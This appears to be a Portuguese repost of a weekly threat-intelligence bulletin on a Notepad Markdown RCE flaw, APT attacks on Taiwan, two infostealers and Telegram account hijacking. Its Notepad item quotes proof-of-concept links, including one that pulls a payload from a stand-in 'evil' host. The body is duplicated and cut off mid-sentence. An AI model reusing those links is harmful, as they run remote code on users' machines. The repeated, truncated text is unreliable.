🌟 Atualização imperdível para quem gosta de estar bem informado!
Confira agora e compartilhe com seus amigos!
Apoie esse projeto de divulgacao de noticias! Clique aqui
A atividade de ameaças esta semana mostra um sinal consistente: os invasores estão se apoiando mais no que já funciona. Em vez de novas explorações chamativas, muitas operações são construídas em torno do uso indevido silencioso de ferramentas confiáveis, fluxos de trabalho familiares e exposições negligenciadas que ficam à vista de todos.
Outra mudança é como o acesso é obtido versus como ele é usado. Os pontos de entrada iniciais estão a tornar-se mais simples, enquanto a actividade pós-compromisso está a tornar-se mais deliberada, estruturada e persistente. O objetivo é menos perturbar e mais permanecer incorporado por tempo suficiente para extrair valor.
Há também uma sobreposição crescente entre o crime cibernético, a espionagem e a intrusão oportunista. As técnicas estão se espalhando entre os grupos, tornando a atribuição mais difícil e as linhas de base de defesa menos confiáveis.
Abaixo está o Boletim ThreatsDay desta semana – uma análise detalhada dos sinais importantes, resumidos em leituras rápidas. Cada item adiciona contexto ao próximo aumento da pressão da ameaça.
Bloco de notas RCE por meio de links Markdown
Falha no bloco de notas da Microsoft Patches
A Microsoft corrigiu uma falha de injeção de comando (CVE-2026-20841, pontuação CVSS: 8,8) em seu aplicativo Notepad que poderia resultar na execução remota de código. “A neutralização inadequada de elementos especiais usados em um comando ('injeção de comando') no aplicativo Windows Notepad permite que um invasor não autorizado execute código em uma rede”, disse a Microsoft. Um invasor pode explorar essa falha enganando o usuário, fazendo-o clicar em um link malicioso dentro de um arquivo Markdown aberto no Bloco de Notas, fazendo com que o aplicativo execute arquivos remotos. “O código malicioso seria executado no contexto de segurança do usuário que abriu o arquivo Markdown, dando ao invasor as mesmas permissões desse usuário”, acrescentou a gigante da tecnologia. As explorações de prova de conceito (PoC) mostram que a vulnerabilidade pode ser acionada pela criação de um arquivo Markdown com links "file://" que apontam para arquivos executáveis ("file://C:/windows/system32/cmd.exe") ou contêm URIs especiais ("ms-appinstaller://?source=https://evil/xxx.appx") para executar cargas úteis arbitrárias. O problema foi corrigido como parte da atualização mensal do Patch Tuesday esta semana. A Microsoft adicionou suporte Markdown ao Bloco de Notas no Windows 11 em maio passado.
A pressão da APT se intensifica em Taiwan
Taiwan se torna alvo de ataques APT
A TeamT5 disse que rastreou mais de 510 operações avançadas de ameaças persistentes (APT) que afetaram 67 países em todo o mundo em 2025, das quais 173 ataques tiveram como alvo Taiwan. “O papel de Taiwan nas tensões geopolíticas e nos valores da cadeia global de fornecimento de tecnologia torna-o especialmente vulnerável para adversários que procuram inteligência ou acesso a longo prazo para alcançar objectivos políticos e militares”, disse o fornecedor de segurança. “Taiwan é mais do que apenas um alvo – funciona como um campo de provas onde as APTs do nexo com a China testam e refinam as suas tácticas antes de as expandirem para outros ambientes.”
Ladrão de Node.js chega ao Windows
LTX Stealer tem como alvo sistemas Windows
Um novo ladrão de informações do Node.js chamado LTX Stealer foi descoberto. Visando sistemas Windows e distribuído por meio de um instalador Inno Setup altamente ofuscado, o malware realiza coleta de credenciais em grande escala de navegadores baseados em Chromium, tem como alvo artefatos relacionados a criptomoedas e prepara os dados coletados para exfiltração. “A campanha depende de uma infraestrutura de gerenciamento apoiada em nuvem, onde o Supabase é usado exclusivamente como camada de autenticação e controle de acesso para o painel do operador, enquanto o Cloudflare é aproveitado para serviços de front-end e mascarar detalhes da infraestrutura”, disse CYFIRMA.
Marco Stealer expande roubo de dados
Marco Stealer surge na natureza
Outro novo ladrão de informações voltado para o Windows é o Marco Stealer, que foi observado pela primeira vez em junho de 2025. Entregue por meio de um downloader em um arquivo ZIP, ele tem como alvo principalmente dados do navegador, informações de carteiras de criptomoedas, arquivos de serviços de nuvem populares como Dropbox e Google Drive e outros arquivos confidenciais armazenados no sistema da vítima. “Marco Stealer depende de strings criptografadas que são descriptografadas apenas em tempo de execução para evitar análise estática. Além disso, o ladrão de informações usa APIs do Windows para detectar ferramentas anti-análise como Wireshark, x64dbg e Process Hacker”, disse Zscaler ThreatLabz. "Os dados roubados são criptografados usando AES-256 antes de serem enviados aos servidores C2 por meio de solicitações HTTP POST."
Sessões de telegrama sequestradas por abuso de OAuth
Campanha de engenharia social tem como alvo contas de telegrama
Foi observada uma nova campanha de controle de conta, abusando dos fluxos de trabalho de autenticação nativos do Telegram para obter sessões de usuários totalmente autorizadas. Em uma variante, as vítimas são solicitadas a escanear um código QR em sites falsos usando o aplicativo móvel Telegram, iniciando uma tentativa legítima de login no Telegram vinculada a credenciais de API controladas pelo invasor. O Telegram então envia uma autenticação no aplicativo
Outra mudança é como o acesso é obtido versus como ele é usado. Os pontos de entrada iniciais estão a tornar-se mais simples, enquanto a actividade pós-compromisso está a tornar-se mais deliberada, estruturada e persistente. O objetivo é menos perturbar e mais permanecer incorporado por tempo suficiente para extrair valor.
Há também uma sobreposição crescente entre o crime cibernético, a espionagem e a intrusão oportunista. As técnicas estão se espalhando entre os grupos, tornando a atribuição mais difícil e as linhas de base de defesa menos confiáveis.
Abaixo está o Boletim ThreatsDay desta semana – uma análise detalhada dos sinais importantes, resumidos em leituras rápidas. Cada item adiciona contexto ao próximo aumento da pressão da ameaça.
Bloco de notas RCE por meio de links Markdown
Falha no bloco de notas da Microsoft Patches
A Microsoft corrigiu uma falha de injeção de comando (CVE-2026-20841, pontuação CVSS: 8,8) em seu aplicativo Notepad que poderia resultar na execução remota de código. “A neutralização inadequada de elementos especiais usados em um comando ('injeção de comando') no aplicativo Windows Notepad permite que um invasor não autorizado execute código em uma rede”, disse a Microsoft. Um invasor pode explorar essa falha enganando o usuário, fazendo-o clicar em um link malicioso dentro de um arquivo Markdown aberto no Bloco de Notas, fazendo com que o aplicativo execute arquivos remotos. “O código malicioso seria executado no contexto de segurança do usuário que abriu o arquivo Markdown, dando ao invasor as mesmas permissões desse usuário”, acrescentou a gigante da tecnologia. As explorações de prova de conceito (PoC) mostram que a vulnerabilidade pode ser acionada pela criação de um arquivo Markdown com links "file://" que apontam para arquivos executáveis ("file://C:/windows/system32/cmd.exe") ou contêm URIs especiais ("ms-appinstaller://?source=https://evil/xxx.appx") para executar cargas úteis arbitrárias. O problema foi corrigido como parte da atualização mensal do Patch Tuesday esta semana. A Microsoft adicionou suporte Markdown ao Bloco de Notas no Windows 11 em maio passado.
A pressão da APT se intensifica em Taiwan
Taiwan se torna alvo de ataques APT
A TeamT5 disse que rastreou mais de 510 operações avançadas de ameaças persistentes (APT) que afetaram 67 países em todo o mundo em 2025, das quais 173 ataques tiveram como alvo Taiwan. “O papel de Taiwan nas tensões geopolíticas e nos valores da cadeia global de fornecimento de tecnologia torna-o especialmente vulnerável para adversários que procuram inteligência ou acesso a longo prazo para alcançar objectivos políticos e militares”, disse o fornecedor de segurança. “Taiwan é mais do que apenas um alvo – funciona como um campo de provas onde as APTs do nexo com a China testam e refinam as suas tácticas antes de as expandirem para outros ambientes.”
Ladrão de Node.js chega ao Windows
LTX Stealer tem como alvo sistemas Windows
Um novo ladrão de informações do Node.js chamado LTX Stealer foi descoberto. Visando sistemas Windows e distribuído por meio de um instalador Inno Setup altamente ofuscado, o malware realiza coleta de credenciais em grande escala de navegadores baseados em Chromium, tem como alvo artefatos relacionados a criptomoedas e prepara os dados coletados para exfiltração. “A campanha depende de uma infraestrutura de gerenciamento apoiada em nuvem, onde o Supabase é usado exclusivamente como camada de autenticação e controle de acesso para o painel do operador, enquanto o Cloudflare é aproveitado para serviços de front-end e mascarar detalhes da infraestrutura”, disse CYFIRMA.
Marco Stealer expande roubo de dados
Marco Stealer surge na natureza
Outro novo ladrão de informações voltado para o Windows é o Marco Stealer, que foi observado pela primeira vez em junho de 2025. Entregue por meio de um downloader em um arquivo ZIP, ele tem como alvo principalmente dados do navegador, informações de carteiras de criptomoedas, arquivos de serviços de nuvem populares como Dropbox e Google Drive e outros arquivos confidenciais armazenados no sistema da vítima. “Marco Stealer depende de strings criptografadas que são descriptografadas apenas em tempo de execução para evitar análise estática. Além disso, o ladrão de informações usa APIs do Windows para detectar ferramentas anti-análise como Wireshark, x64dbg e Process Hacker”, disse Zscaler ThreatLabz. "Os dados roubados são criptografados usando AES-256 antes de serem enviados aos servidores C2 por meio de solicitações HTTP POST."
Sessões de telegrama sequestradas por abuso de OAuth
Campanha de engenharia social tem como alvo contas de telegrama
Foi observada uma nova campanha de controle de conta, abusando dos fluxos de trabalho de autenticação nativos do Telegram para obter sessões de usuários totalmente autorizadas. Em uma variante, as vítimas são solicitadas a escanear um código QR em sites falsos usando o aplicativo móvel Telegram, iniciando uma tentativa legítima de login no Telegram vinculada a credenciais de API controladas pelo invasor. O Telegram então envia uma autenticação no aplicativo
Fonte: https://thehackernews.com
#samirnews #samir #news #boletimtec #boletim #threatsday: #ai #prompt #rce, #claude #0click, #renengine #loader, #auto #0days #e #mais #de #25 #histórias
⚡ Fique ligado: novidades e promoções em breve por aqui! ⚡
Postar um comentário